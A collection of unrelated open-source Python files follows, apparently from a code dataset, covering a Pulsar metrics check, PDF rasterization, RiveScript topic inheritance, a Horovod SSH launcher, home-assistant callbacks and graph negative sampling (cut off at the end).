EVENT_TYPE = SOURCE_TYPE_NAME = 'pulsar'
class PulsarCheck(OpenMetricsBaseCheck):
"""
PulsarCheck derives from AgentCheck that provides the required check method
"""
def __init__(self, name, init_config, instances=None):
instance = instances[0]
url = instance.get('prometheus_url')
if url is None:
raise ConfigurationError("Unable to find prometheus_url in config file.")
self.NAMESPACE = 'kesque.pulsar'
self.metrics_mapper = {
'pulsar_consumer_available_permits': 'consumer.available_permits',
'pulsar_consumer_blocked_on_unacked_messages': 'consumer.blocked_on_unacked_messages',
'pulsar_consumer_msg_rate_out': 'consumer.msg_rate_out',
'pulsar_consumer_msg_rate_redeliver': 'consumer.msg_rate_redeliver',
'pulsar_consumer_msg_throughput_out': 'consumer.msg_throughput_out',
'pulsar_consumer_unacked_messages': 'consumer.unacked_messages',
'pulsar_consumers_count': 'consumers_count',
'pulsar_entry_size_count': 'entry_size_count',
'pulsar_entry_size_le_100_kb': 'entry_size_le_100_kb',
'pulsar_entry_size_le_128': 'entry_size_le_128',
'pulsar_entry_size_le_16_kb': 'entry_size_le_16_kb',
'pulsar_entry_size_le_1_kb': 'entry_size_le_1_kb',
'pulsar_entry_size_le_1_mb': 'entry_size_le_1_mb',
'pulsar_entry_size_le_2_kb': 'entry_size_le_2_kb',
'pulsar_entry_size_le_4_kb': 'entry_size_le_4_kb',
'pulsar_entry_size_le_512': 'entry_size_le_512',
'pulsar_entry_size_le_overflow': 'entry_size_le_overflow',
'pulsar_entry_size_sum': 'entry_size_sum',
'pulsar_in_bytes_total': 'in_bytes_total',
'pulsar_in_messages_total': 'in_messages_total',
'pulsar_msg_backlog': 'msg_backlog',
'pulsar_out_bytes_total': 'out_bytes_total',
'pulsar_out_messages_total': 'out_messages_total',
'pulsar_producers_count': 'producers_count',
'pulsar_rate_in': 'rate_in',
'pulsar_rate_out': 'rate_out',
'pulsar_replication_backlog': 'replication.backlog',
'pulsar_replication_rate_in': 'replication.rate_in',
'pulsar_replication_rate_out': 'replication.rate_out',
'pulsar_replication_throughput_in': 'replication.throughput_in',
'pulsar_replication_throughput_out': 'replication.throughput_out',
'pulsar_storage_backlog_quota_limit': 'storage.backlog_quota_limit',
'pulsar_storage_backlog_size': 'storage.backlog_size',
'pulsar_storage_read_rate': 'storage.read_rate',
'pulsar_storage_offloaded_size': 'storage.offloaded_size',
'pulsar_storage_size': 'storage.size',
'pulsar_storage_write_latency_count': 'storage.write_latency_count',
'pulsar_storage_write_latency_le_0_5': 'storage.write_latency_le_0_5',
'pulsar_storage_write_latency_le_1': 'storage.write_latency_le_1',
'pulsar_storage_write_latency_le_10': 'storage.write_latency_le_10',
'pulsar_storage_write_latency_le_100': 'storage.write_latency_le_100',
'pulsar_storage_write_latency_le_1000': 'storage.write_latency_le_1000',
'pulsar_storage_write_latency_le_20': 'storage.write_latency_le_20',
'pulsar_storage_write_latency_le_200': 'storage.write_latency_le_200',
'pulsar_storage_write_latency_le_5': 'storage.write_latency_le_5',
'pulsar_storage_write_latency_le_50': 'storage.write_latency_le_50',
'pulsar_storage_write_latency_overflow': 'storage.write_latency_overflow',
'pulsar_storage_write_latency_sum': 'storage.write_latency_sum',
'pulsar_storage_write_rate': 'storage.write_rate',
'pulsar_subscription_back_log': 'subscription.back_log',
'pulsar_subscription_back_log_no_delayed': 'subscription.back_log_no_delayed',
'pulsar_subscription_blocked_on_unacked_messages': 'subscription.blocked_on_unacked_messages',
'pulsar_subscription_delayed': 'subscription.delayed',
'pulsar_subscription_msg_rate_out': 'subscription.msg_rate_out',
'pulsar_subscription_msg_rate_redeliver': 'subscription.msg_rate_redeliver',
'pulsar_subscription_msg_throughput_out': 'subscription.msg_throughput_out',
'pulsar_subscription_unacked_messages': 'subscription.unacked_messages',
'pulsar_subscriptions_count': 'subscriptions.count',
'pulsar_throughput_in': 'throughput_in',
'pulsar_throughput_out': 'throughput_out',
'pulsar_topics_count': 'topics_count',
'scrape_duration_seconds': 'scrape_duration_seconds',
'scrape_samples_post_metric_relabeling': 'scrape_samples_post_metric_relabeling',
'scrape_samples_scraped': 'scrape_samples_scraped',
'topic_load_times': 'topic_load_times',
'topic_load_times_count': 'topic_load_times_count',
'topic_load_times_sum': 'topic_load_times_sum',
'up': 'broker.up',
}
instance.update(
{
'prometheus_url': url,
'namespace': self.NAMESPACE,
'metrics': [self.metrics_mapper],
'send_distribution_counts_as_monotonic': instance.get('send_distribution_counts_as_monotonic', True),
'send_distribution_sums_as_monotonic': instance.get('send_distribution_sums_as_monotonic', True),
}
)
super(PulsarCheck, self).__init__(name, init_config, instances)
|
evaluation/datasets/build_dataset_images.py | hsiehkl/pdffigures2 | 296 | 9127 | <filename>evaluation/datasets/build_dataset_images.py
import argparse
from os import listdir, mkdir
from os.path import join, isdir
from subprocess import call
import sys
import datasets
from shutil import which
"""
Script to use pdftoppm to turn the pdfs into single images per page
"""
def get_images(pdf_dir, output_dir, dpi, mono=True):
if which("pdftoppm") is None:
raise ValueError("Requires executable pdftopmm to be on the PATH")
if not isdir(output_dir):
print("Making %s to store rasterized PDF pages" % output_dir)
mkdir(output_dir)
if not isdir(pdf_dir):
raise ValueError(pdf_dir + " is not a directory")
pdf_doc_ids = [x.split(".pdf")[0] for x in listdir(pdf_dir)]
already_have = set()
for filename in listdir(output_dir):
if "-page" not in filename:
raise ValueError()
doc_id = filename.split("-page")[0]
if doc_id not in pdf_doc_ids:
raise ValueError("doc id %s in output dir not found in pdfs" % doc_id)
already_have.add(doc_id)
if len(already_have) != 0:
print("Already have %d docs" % len(already_have))
num_pdfs = len(listdir(pdf_dir))
for (i, pdfname) in enumerate(listdir(pdf_dir)):
if not pdfname.endswith(".pdf"):
raise ValueError()
doc_id = pdfname[:-4]
if doc_id in already_have:
continue
print("Creating images for pdf %s (%d / %d)" % (pdfname, i + 1, num_pdfs))
if (mono):
args = ["pdftoppm", "-gray", "-r", str(dpi),
"-aa", "no", "-aaVector", "no", "-cropbox",
join(pdf_dir, pdfname), join(output_dir, doc_id + "-page")]
else:
args = ["pdftoppm", "-jpeg", "-r", str(dpi), "-cropbox",
join(pdf_dir, pdfname), join(output_dir, doc_id + "-page")]
retcode = call(args)
if retcode != 0:
raise ValueError("Bad return code for <%s> (%d)", " ".join(args), retcode)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Cache rasterized page images for a dataset')
parser.add_argument("dataset", choices=datasets.DATASETS.keys(), help="target dataset")
parser.add_argument("color", choices=["gray", "color"], help="kind of images to render")
args = parser.parse_args()
dataset = datasets.get_dataset(args.dataset)
print("Running on dataset: " + dataset.name)
if args.color == "gray":
get_images(dataset.pdf_dir, dataset.page_images_gray_dir,
dataset.IMAGE_DPI, True)
elif args.color == "color":
get_images(dataset.pdf_dir, dataset.page_images_color_dir,
dataset.COLOR_IMAGE_DPI, False)
else:
exit(1)
|
python_packages_static/flopy/mf6/__init__.py | usgs/neversink_workflow | 351 | 9136 | <gh_stars>100-1000
# imports
from . import coordinates
from . import data
from .modflow import *
from . import utils
from .data import mfdatascalar, mfdatalist, mfdataarray
from .mfmodel import MFModel
from .mfbase import ExtFileAction
|
colbert/parameters.py | techthiyanes/ColBERT | 421 | 9150 | import torch
DEVICE = torch.device("cuda")
SAVED_CHECKPOINTS = [32*1000, 100*1000, 150*1000, 200*1000, 300*1000, 400*1000]
SAVED_CHECKPOINTS += [10*1000, 20*1000, 30*1000, 40*1000, 50*1000, 60*1000, 70*1000, 80*1000, 90*1000]
SAVED_CHECKPOINTS += [25*1000, 50*1000, 75*1000]
SAVED_CHECKPOINTS = set(SAVED_CHECKPOINTS)
|
venv/Lib/site-packages/rivescript/inheritance.py | Hazemcodes/GimmyBot | 154 | 9174 | # RiveScript-Python
#
# This code is released under the MIT License.
# See the "LICENSE" file for more information.
#
# https://www.rivescript.com/
def get_topic_triggers(rs, topic, thats, depth=0, inheritance=0, inherited=False):
"""Recursively scan a topic and return a list of all triggers.
Arguments:
rs (RiveScript): A reference to the parent RiveScript instance.
topic (str): The original topic name.
thats (bool): Are we getting triggers for 'previous' replies?
depth (int): Recursion step counter.
inheritance (int): The inheritance level counter, for topics that
inherit other topics.
inherited (bool): Whether the current topic is inherited by others.
Returns:
[]str: List of all triggers found.
"""
# Break if we're in too deep.
if depth > rs._depth:
rs._warn("Deep recursion while scanning topic inheritance")
# Keep in mind here that there is a difference between 'includes' and
# 'inherits' -- topics that inherit other topics are able to OVERRIDE
# triggers that appear in the inherited topic. This means that if the top
# topic has a trigger of simply '*', then NO triggers are capable of
# matching in ANY inherited topic, because even though * has the lowest
# priority, it has an automatic priority over all inherited topics.
#
# The getTopicTriggers method takes this into account. All topics that
# inherit other topics will have their triggers prefixed with a fictional
# {inherits} tag, which would start at {inherits=0} and increment if this
# topic has other inheriting topics. So we can use this tag to make sure
# topics that inherit things will have their triggers always be on top of
# the stack, from inherits=0 to inherits=n.
# Important info about the depth vs inheritance params to this function:
# depth increments by 1 each time this function recursively calls itrs.
# inheritance increments by 1 only when this topic inherits another
# topic.
#
# This way, '> topic alpha includes beta inherits gamma' will have this
# effect:
# alpha and beta's triggers are combined together into one matching
# pool, and then those triggers have higher matching priority than
# gamma's.
#
# The inherited option is True if this is a recursive call, from a topic
# that inherits other topics. This forces the {inherits} tag to be added
# to the triggers. This only applies when the top topic 'includes'
# another topic.
rs._say("\tCollecting trigger list for topic " + topic + "(depth="
+ str(depth) + "; inheritance=" + str(inheritance) + "; "
+ "inherited=" + str(inherited) + ")")
# topic: the name of the topic
# depth: starts at 0 and ++'s with each recursion
# Topic doesn't exist?
if not topic in rs._topics:
rs._warn("Inherited or included topic {} doesn't exist or has no triggers".format(
topic
))
return []
# Collect an array of triggers to return.
triggers = []
# Get those that exist in this topic directly.
inThisTopic = []
if not thats:
# The non-that structure is {topic}->[array of triggers]
if topic in rs._topics:
for trigger in rs._topics[topic]:
inThisTopic.append([ trigger["trigger"], trigger ])
else:
# The 'that' structure is: {topic}->{cur trig}->{prev trig}->{trig info}
if topic in rs._thats.keys():
for curtrig in rs._thats[topic].keys():
for previous, pointer in rs._thats[topic][curtrig].items():
inThisTopic.append([ pointer["trigger"], pointer ])
# Does this topic include others?
if topic in rs._includes:
# Check every included topic.
for includes in rs._includes[topic]:
rs._say("\t\tTopic " + topic + " includes " + includes)
triggers.extend(get_topic_triggers(rs, includes, thats, (depth + 1), inheritance, True))
# Does this topic inherit others?
if topic in rs._lineage:
# Check every inherited topic.
for inherits in rs._lineage[topic]:
rs._say("\t\tTopic " + topic + " inherits " + inherits)
triggers.extend(get_topic_triggers(rs, inherits, thats, (depth + 1), (inheritance + 1), False))
# Collect the triggers for *this* topic. If this topic inherits any
# other topics, it means that this topic's triggers have higher
# priority than those in any inherited topics. Enforce this with an
# {inherits} tag.
if topic in rs._lineage or inherited:
for trigger in inThisTopic:
rs._say("\t\tPrefixing trigger with {inherits=" + str(inheritance) + "}" + trigger[0])
triggers.append(["{inherits=" + str(inheritance) + "}" + trigger[0], trigger[1]])
else:
triggers.extend(inThisTopic)
return triggers
def get_topic_tree(rs, topic, depth=0):
"""Given one topic, get the list of all included/inherited topics.
:param str topic: The topic to start the search at.
:param int depth: The recursion depth counter.
:return []str: Array of topics.
"""
# Break if we're in too deep.
if depth > rs._depth:
rs._warn("Deep recursion while scanning topic trees!")
return []
# Collect an array of all topics.
topics = [topic]
# Does this topic include others?
if topic in rs._includes:
# Try each of these.
for includes in sorted(rs._includes[topic]):
topics.extend(get_topic_tree(rs, includes, depth + 1))
# Does this topic inherit others?
if topic in rs._lineage:
# Try each of these.
for inherits in sorted(rs._lineage[topic]):
topics.extend(get_topic_tree(rs, inherits, depth + 1))
return topics
|
training/horovod/base/horovod_wrapper.py | thehardikv/ai-platform-samples | 418 | 9194 | <reponame>thehardikv/ai-platform-samples
import collections
import datetime
import json
import multiprocessing
import os
import subprocess
import sys
import time
_SSHD_BINARY_PATH = "/usr/sbin/sshd"
EnvironmentConfig = collections.namedtuple(
"EnvironmentConfig",
["hosts", "port", "is_chief", "pools", "job_id"])
class DeadlineExceededError(Exception):
"""Indicates an action took too long."""
pass
def _sub_process_num_gpus(unused):
del unused
# This is imported here so that we don't load tensorflow in the parent
# process. Once the sub-process exits, it releases its allocated GPU memory.
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
gpus = [x.name for x in local_device_protos if x.device_type == "GPU"]
return len(gpus)
def _get_available_gpus():
"""Returns the number of GPUs on the machine."""
pool = multiprocessing.Pool(1)
result = pool.map(_sub_process_num_gpus, [None])[0]
pool.close()
pool.join()
return result
def parse_environment_config(env_config_str, job_id):
"""Parses environment config and returns a list of hosts as well as the role.
Returns:
An EnvironmentConfig.
"""
if env_config_str:
ssh_port = -1
env_config_json = json.loads(env_config_str)
cluster = env_config_json.get("cluster")
if not cluster:
return None, True
hosts = []
pools = collections.defaultdict(list)
for pool_type, tasks_per_type in cluster.items():
if pool_type == "master":
pool_type = "chief"
for host_and_port in tasks_per_type:
host, port = host_and_port.split(":")
if host == "127.0.0.1":
host = "localhost"
port = int(port)
if ssh_port == -1:
ssh_port = port
elif ssh_port != port:
raise ValueError("Inconsistent ssh ports across tasks %d != %d." %
(ssh_port, port))
hosts.append(host)
pools[pool_type].append(host)
is_chief = False
has_chief = "chief" in pools
if (env_config_json["task"]["type"] == "master" or
env_config_json["task"]["type"] == "chief"):
is_chief = True
if int(env_config_json["task"]["index"]) != 0:
raise ValueError("Only one master node is expected.")
elif ((not has_chief) and
(env_config_json["task"]["type"] == "worker") and
int(env_config_json["task"]["index"]) == 0):
is_chief = True
pools["chief"].append(pools["worker"].pop(0))
elif env_config_json["task"]["type"] != "worker":
raise ValueError("Unexpected task type for Horovod training: %s." %
env_config_json["task"]["type"])
return EnvironmentConfig(hosts=hosts, port=port, is_chief=is_chief,
pools=pools, job_id=job_id)
else:
return EnvironmentConfig(hosts=["localhost"], port=2222, is_chief=True,
pools={"chief": ["localhost"]}, job_id=job_id)
def start_ssh_server(port, is_chief):
ssh_server_command = [_SSHD_BINARY_PATH, "-p", str(port)]
if not is_chief:
ssh_server_command.append("-D")
completed = subprocess.call(ssh_server_command)
if completed != 0:
raise OSError("SSH server did not start successfully.")
def wait_for_ssh_servers(hosts, port, timeout_seconds):
deadline_datetime = datetime.datetime.utcnow() + datetime.timedelta(
seconds=timeout_seconds)
unavailable_hosts = []
while datetime.datetime.utcnow() < deadline_datetime:
unavailable_hosts = []
for host in hosts:
ssh_command = ["ssh", "-q", host, "-p", str(port), "true"]
result = subprocess.call(ssh_command)
if result != 0:
unavailable_hosts.append(host)
if not unavailable_hosts:
return
# Retry in 1 second.
time.sleep(1)
raise DeadlineExceededError(
"Timed out while waiting for all hosts to start. "
"Hosts still not available: %s. TASK_STARTUP_TIMEOUT_SECONDS=%d" %
(unavailable_hosts, timeout_seconds))
def run_horovod(env_config, jobs_per_host, args):
env = dict(os.environ)
del env["TF_CONFIG"]
num_jobs = len(env_config.hosts) * jobs_per_host
hosts = ",".join("%s:%d" % (h, jobs_per_host) for h in env_config.hosts)
horovod_command = [
"horovodrun", "--ssh-port", str(env_config.port), "-H",
hosts, "--num-proc", str(num_jobs)
]
horovod_command.extend(args)
exit_code = subprocess.call(horovod_command, env=env)
return exit_code
def benchmark_network(env_config):
if not env_config.pools["worker"]:
raise ValueError("No workers in the pool to do network benchmarking.")
iperf_server = ["iperf", "-s", "-p", "6000"]
server = subprocess.Popen(iperf_server)
# Wait 10 seconds for the local server to start.
time.sleep(10)
iperf_command = ["ssh", "-q", env_config.pools["worker"][0], "-p",
str(env_config.port),
"iperf", "-p", "6000", "-c", env_config.pools["chief"][0]]
subprocess.call(iperf_command)
server.kill()
def copy_files_recursively(src, dest):
if not dest.startswith("gs://"):
try:
os.makedirs(dest)
except OSError:
pass
copy_cmd = ["gsutil", "-m", "rsync", "-r", src, dest]
exit_code = subprocess.call(copy_cmd)
if exit_code != 0:
raise RuntimeError("Error while copying %s to %s" % (src, dest))
return exit_code
def main():
env_config_str = os.environ.get("TF_CONFIG")
job_id = os.environ.get("CLOUD_ML_JOB_ID", "localrun")
env_config = parse_environment_config(env_config_str, job_id)
print (env_config, env_config.pools, env_config.hosts, os.environ)
if os.environ.get("STAGE_GCS_PATH", False):
copy_files_recursively(
os.environ.get("STAGE_GCS_PATH"),
os.environ.get("STAGING_DIR", "/input"))
start_ssh_server(env_config.port, env_config.is_chief)
max_num_retries = os.environ.get("NUM_HOROVOD_RETRIES", 1)
if env_config.is_chief:
exit_code = 0
for retry in range(max_num_retries):
staging_timeout_seconds = int(
os.environ.get("TASK_STARTUP_TIMEOUT_SECONDS", 600))
wait_for_ssh_servers(env_config.hosts, env_config.port,
staging_timeout_seconds)
if os.environ.get("BENCHMARK_NETWORK", False):
benchmark_network(env_config)
num_gpus = _get_available_gpus()
# If there are no GPUs, we can just run single process per machine.
jobs_per_host = max(1, num_gpus)
args = sys.argv[1:]
exit_code = run_horovod(env_config=env_config, jobs_per_host=jobs_per_host,
args=args)
if exit_code == 0:
break
else:
print ("Retrying...", retry, "out of", max_num_retries)
if os.environ.get("GCS_OUTPUT_PATH", False):
copy_files_recursively(
os.environ.get("OUTPUT_DIR", "/output"),
os.path.join(os.environ.get("GCS_OUTPUT_PATH"), job_id))
sys.exit(exit_code)
if __name__ == "__main__":
main()
|
usr/callbacks/action/tools.py | uwitec/LEHome | 151 | 9206 | #!/usr/bin/env python
# encoding: utf-8
from __future__ import division
from decimal import Decimal
import subprocess
import threading
import urllib2
import urllib
import httplib
import json
import re
import hashlib
import base64
# import zlib
from lib.command.runtime import UserInput
from lib.helper.CameraHelper import CameraHelper
from lib.sound import Sound
from util import Util
from util.Res import Res
from util.log import *
from lib.model import Callback
class timer_callback(Callback.Callback):
def callback(self, cmd, action, target, msg):
if msg is None:
self._home.publish_msg(cmd, u"时间格式错误")
return False, None
if msg.endswith(u'点') or \
msg.endswith(u'分'):
t = Util.gap_for_timestring(msg)
elif msg.endswith(u"秒"):
t = int(Util.cn2dig(msg[:-1]))
elif msg.endswith(u"分钟"):
t = int(Util.cn2dig(msg[:-2]))*60
elif msg.endswith(u"小时"):
t = int(Util.cn2dig(msg[:-2]))*60*60
else:
self._home.publish_msg(cmd, u"时间格式错误")
return False
if t is None:
self._home.publish_msg(cmd, u"时间格式错误")
return False, None
DEBUG("thread wait for %d sec" % (t, ))
self._home.publish_msg(cmd, action + target + msg)
threading.current_thread().waitUtil(t)
if threading.current_thread().stopped():
return False
self._home.setResume(True)
count = 7
Sound.notice( Res.get_res_path("sound/com_bell"), True, count)
self._home.setResume(False)
return True
class translate_callback(Callback.Callback):
base_url = "http://fanyi.youdao.com/openapi.do"
def callback(self, cmd, msg):
if Util.empty_str(msg):
cancel_flag = u"取消"
finish_flag = u"完成"
self._home.publish_msg(
cmd
, u"请输入内容, 输入\"%s\"或\"%s\"结束:" % (finish_flag, cancel_flag)
, cmd_type="input"
)
msg = UserInput(self._home).waitForInput(
finish=finish_flag,
cancel=cancel_flag)
if msg is None:
self._home.publish_msg(cmd, u"无翻译内容")
elif len(msg) > 200:
self._home.publish_msg(cmd, u"翻译内容过长(<200字)")
else:
try:
values = {
"keyfrom":"11111testt111",
"key":"2125866912",
"type":"data",
"doctype":"json",
"version":"1.1",
"q":msg.encode("utf-8")
}
url = translate_callback.base_url + "?" + urllib.urlencode(values)
res = urllib2.urlopen(url).read()
res = " ".join(json.loads(res)["translation"])
self._home.publish_msg(cmd, u"翻译结果:\n" + res)
except Exception, ex:
ERROR("request error:", ex)
self._home.publish_msg(cmd, u"翻译失败")
return True
return True
class baidu_wiki_callback(Callback.Callback):
base_url = "http://wapbaike.baidu.com"
def searchWiki(self, word, time=10):
value = {"word": word.encode("utf-8")}
url = baidu_wiki_callback.base_url + \
"/search?" + urllib.urlencode(value)
try:
response = urllib2.urlopen(url, timeout=time)
html = response.read().encode("utf-8")
response.close()
real_url = None
content = None
m = re.compile(r"URL=(.+)'>").search(html)
if m:
real_url = m.group(1)
else:
return None, None
real_url = real_url[:real_url.index("?")]
if not real_url is None:
url = baidu_wiki_callback.base_url + real_url
response = urllib2.urlopen(url, timeout=time)
html = response.read()
response.close()
m = re.compile(
r'<p class="summary"><p>(.+)<div class="card-info">',
re.DOTALL
).search(html)
if m:
content = m.group(1)
return Util.strip_tags(content), url
else:
return None, None
except Exception, ex:
ERROR("wiki error: ", ex)
return None, None
def callback(self, cmd, msg):
if Util.empty_str(msg):
cancel_flag = u"取消"
finish_flag = u"完成"
self._home.publish_msg(
cmd
, u"请输入内容, 输入\"%s\"或\"%s\"结束:" % (finish_flag, cancel_flag)
, cmd_type="input"
)
msg = UserInput(self._home).waitForInput(
finish=finish_flag,
cancel=cancel_flag)
if not msg is None:
self._home.publish_msg(cmd, u"正在搜索...")
res, url = self.searchWiki(msg)
if res is None:
self._home.publish_msg(cmd, u"无百科内容")
else:
res = res.decode("utf-8")
if len(res) > 140:
res = res[:140]
msg = u"百度百科:\n %s...\n%s" \
% (res, url)
self._home.publish_msg(cmd, msg)
else:
self._home.publish_msg(cmd, u"无百科内容")
return True
class cal_callback(Callback.Callback):
_ops = {
u'加':'+',
u'减':'-',
u'乘':'*',
u'除':'/',
u'+':'+',
u'-':'-',
u'*':'*',
u'/':'/',
u'(':'(',
u'(':'(',
u')':')',
u')':')',
}
def _parse_tokens(self, src):
tokens = []
cur_t = u''
for term in src:
if term in cal_callback._ops:
if cur_t != u'':
tokens.append(cur_t)
cur_t = u''
tokens.append(term)
else:
cur_t += term
if cur_t != u'':
tokens.append(cur_t)
return tokens
def _parse_expression(self, tokens):
expression = u''
for token in tokens:
if token in cal_callback._ops:
expression += cal_callback._ops[token]
else:
num = Util.cn2dig(token)
if num is None:
return None
expression += str(num)
res = None
INFO("expression: " + expression)
try:
res = eval(expression)
res = Decimal.from_float(res).quantize(Decimal('0.00'))
except Exception, ex:
ERROR("cal expression error:", ex)
return res
def callback(self, cmd, msg):
if Util.empty_str(msg):
cancel_flag = u"取消"
finish_flag = u"完成"
self._home.publish_msg(
cmd
, u"请输入公式, 输入\"%s\"或\"%s\"结束:" % (finish_flag, cancel_flag)
, cmd_type="input"
)
msg = UserInput(self._home).waitForInput(
finish=finish_flag,
cancel=cancel_flag)
if msg is None:
self._home.publish_msg(cmd, u"无公式内容")
else:
tokens = self._parse_tokens(msg)
if not tokens is None:
res = self._parse_expression(tokens)
if not res is None:
self._home.publish_msg(cmd, u"%s = %s" % (msg, str(res)))
return True, res
else:
self._home.publish_msg(cmd, u"计算出错")
return True, None
else:
self._home.publish_msg(cmd, u"格式有误")
return True, None
class camera_quickshot_callback(Callback.Callback):
IMAGE_SERVER_URL = "http://lehome.sinaapp.com/image"
IMAGE_HOST_URL = "http://lehome-image.stor.sinaapp.com/"
def _upload_image(self, img_src, thumbnail_src):
if img_src is None or len(img_src) == 0:
return None, None
INFO("uploading: %s %s" % (img_src, thumbnail_src))
# swift --insecure upload image data/capture/2015_05_23_001856.jpg
proc = subprocess.Popen(
[
"swift",
"--insecure",
"upload",
"image",
thumbnail_src,
img_src
],
stdout=subprocess.PIPE
)
read_img = None
read_thumbnail = None
for i in range(2) :
try:
data = proc.stdout.readline().strip() #block / wait
INFO("swift readline: %s" % data)
if data.endswith(".thumbnail.jpg"):
INFO("save to storage:%s" % data)
read_thumbnail = camera_quickshot_callback.IMAGE_HOST_URL + data
elif data.endswith(".jpg"):
INFO("save to storage:%s" % data)
read_img = camera_quickshot_callback.IMAGE_HOST_URL + data
if not read_img is None and not read_thumbnail is None:
return read_img, read_thumbnail
except (KeyboardInterrupt, SystemExit):
raise
except Exception, ex:
ERROR(ex)
break
return None, None
def callback(self, cmd, msg):
self._home.publish_msg(cmd, u"正在截图...")
Sound.notice(Res.get_res_path("sound/com_shoot"))
save_path="data/capture/"
save_name, thumbnail_name = CameraHelper().take_a_photo(save_path)
# for test
# save_name = "2015_05_02_164052.jpg"
if save_name is None:
self._home.publish_msg(cmd, u"截图失败")
INFO("capture faild.")
return True
img_url, thumbnail_url = self._upload_image(
save_path + save_name,
save_path + thumbnail_name,
)
if img_url is None:
self._home.publish_msg(cmd, u"截图失败")
INFO("upload capture faild.")
return True
else:
self._home.publish_msg(
cmd,
msg=img_url,
cmd_type="capture"
)
return True
class push_info_callback(Callback.Callback):
def callback(self, cmd, target, msg):
if target is None or len(target) == 0:
if msg is None or len(msg) == 0:
self._home.publish_msg(cmd, u"请输入内容")
return True, None
self._home.publish_msg(cmd, msg)
DEBUG("show_callback: %s" % msg)
return True, msg
return True, "push"
|
torch_geometric/utils/negative_sampling.py | NucciTheBoss/pytorch_geometric | 2,350 | 9212 | import random
from typing import Optional, Tuple, Union
import numpy as np
import torch
from torch import Tensor
from torch_geometric.utils import coalesce, degree, remove_self_loops
from .num_nodes import maybe_num_nodes
def negative_sampling(edge_index: Tensor,
num_nodes: Optional[Union[int, Tuple[int, int]]] = None,
num_neg_samples: Optional[int] = None,
method: str = "sparse",
force_undirected: bool = False) -> Tensor:
r"""Samples random negative edges of a graph given by :attr:`edge_index`.
Args:
edge_index (LongTensor): The edge indices.
num_nodes (int or Tuple[int, int], optional): The number of nodes,
*i.e.* :obj:`max_val + 1` of :attr:`edge_index`.
If given as a tuple, then :obj:`edge_index` is interpreted as a
bipartite graph with shape :obj:`(num_src_nodes, num_dst_nodes)`.
(default: :obj:`None`)
num_neg_samples (int, optional): The (approximate) number of negative
samples to return.
If set to :obj:`None`, will try to return a negative edge for every
positive edge. (default: :obj:`None`)
method (string, optional): The method to use for negative sampling,
*i.e.*, :obj:`"sparse"` or :obj:`"dense"`.
This is a memory/runtime trade-off.
:obj:`"sparse"` will work on any graph of any size, while
:obj:`"dense"` can perform faster true-negative checks.
(default: :obj:`"sparse"`)
force_undirected (bool, optional): If set to :obj:`True`, sampled
negative edges will be undirected. (default: :obj:`False`)
:rtype: LongTensor
"""
assert method in ['sparse', 'dense']
size = num_nodes
bipartite = isinstance(size, (tuple, list))
size = maybe_num_nodes(edge_index) if size is None else size
size = (size, size) if not bipartite else size
force_undirected = False if bipartite else force_undirected
idx, population = edge_index_to_vector(edge_index, size, bipartite,
force_undirected)
if idx.numel() >= population:
return edge_index.new_empty((2, 0))
if num_neg_samples is None:
num_neg_samples = edge_index.size(1)
if force_undirected:
num_neg_samples = num_neg_samples // 2
prob = 1. - idx.numel() / population # Probability to sample a negative.
sample_size = int(1.1 * num_neg_samples / prob) # (Over)-sample size.
neg_idx = None
if method == 'dense':
# The dense version creates a mask of shape `population` to check for
# invalid samples.
mask = idx.new_ones(population, dtype=torch.bool)
mask[idx] = False
for _ in range(3): # Number of tries to sample negative indices.
rnd = sample(population, sample_size, idx.device)
rnd = rnd[mask[rnd]] # Filter true negatives.
neg_idx = rnd if neg_idx is None else torch.cat([neg_idx, rnd])
if neg_idx.numel() >= num_neg_samples:
neg_idx = neg_idx[:num_neg_samples]
break
mask[neg_idx] = False
else: # 'sparse'
# The sparse version checks for invalid samples via `np.isin`.
idx = idx.to('cpu')
for _ in range(3): # Number of tries to sample negative indices.
rnd = sample(population, sample_size, device='cpu')
mask = np.isin(rnd, idx)
if neg_idx is not None:
mask |= np.isin(rnd, neg_idx.to('cpu'))
mask = torch.from_numpy(mask).to(torch.bool)
rnd = rnd[~mask].to(edge_index.device)
neg_idx = rnd if neg_idx is None else torch.cat([neg_idx, rnd])
if neg_idx.numel() >= num_neg_samples:
neg_idx = neg_idx[:num_neg_samples]
break
return vector_to_edge_index(neg_idx, size, bipartite, force_undirected)
def batched_negative_sampling(
edge_index: Tensor,
batch: Union[Tensor, Tuple[Tensor, Tensor]],
num_neg_samples: Optional[int] = None,
method: str = "sparse",
force_undirected: bool = False,
) -> Tensor:
r"""Samples random negative edges of multiple graphs given by
:attr:`edge_index` and :attr:`batch`.
Args:
edge_index (LongTensor): The edge indices.
batch (LongTensor or Tuple[LongTensor, LongTensor]): Batch vector
:math:`\mathbf{b} \in {\{ 0, \ldots, B-1\}}^N`, which assigns each
node to a specific example.
If given as a tuple, then :obj:`edge_index` is interpreted as a
bipartite graph connecting two different node types.
num_neg_samples (int, optional): The number of negative samples to
return. If set to :obj:`None`, will try to return a negative edge
for every positive edge. (default: :obj:`None`)
method (string, optional): The method to use for negative sampling,
*i.e.*, :obj:`"sparse"` or :obj:`"dense"`.
This is a memory/runtime trade-off.
:obj:`"sparse"` will work on any graph of any size, while
:obj:`"dense"` can perform faster true-negative checks.
(default: :obj:`"sparse"`)
force_undirected (bool, optional): If set to :obj:`True`, sampled
negative edges will be undirected. (default: :obj:`False`)
:rtype: LongTensor
"""
if isinstance(batch, Tensor):
src_batch, dst_batch = batch, batch
else:
src_batch, dst_batch = batch[0], batch[1]
split = degree(src_batch[edge_index[0]], dtype=torch.long).tolist()
edge_indices = torch.split(edge_index, split, dim=1)
num_src = degree(src_batch, dtype=torch.long)
cum_src = torch.cat([src_batch.new_zeros(1), num_src.cumsum(0)[:-1]])
if isinstance(batch, Tensor):
num_nodes = num_src.tolist()
cumsum = cum_src
else:
num_dst = degree(dst_batch, dtype=torch.long)
cum_dst = torch.cat([dst_batch.new_zeros(1), num_dst.cumsum(0)[:-1]])
num_nodes = torch.stack([num_src, num_dst], dim=1).tolist()
cumsum = torch.stack([cum_src, cum_dst], dim=1).unsqueeze(-1)
neg_edge_indices = []
for i, edge_index in enumerate(edge_indices):
edge_index = edge_index - cumsum[i]
neg_edge_index = negative_sampling(edge_index, num_nodes[i],
num_neg_samples, method,
force_undirected)
neg_edge_index += cumsum[i]
neg_edge_indices.append(neg_edge_index)
return torch.cat(neg_edge_indices, dim=1)
def structured_negative_sampling(edge_index, num_nodes: Optional[int] = None,
contains_neg_self_loops: bool = True):
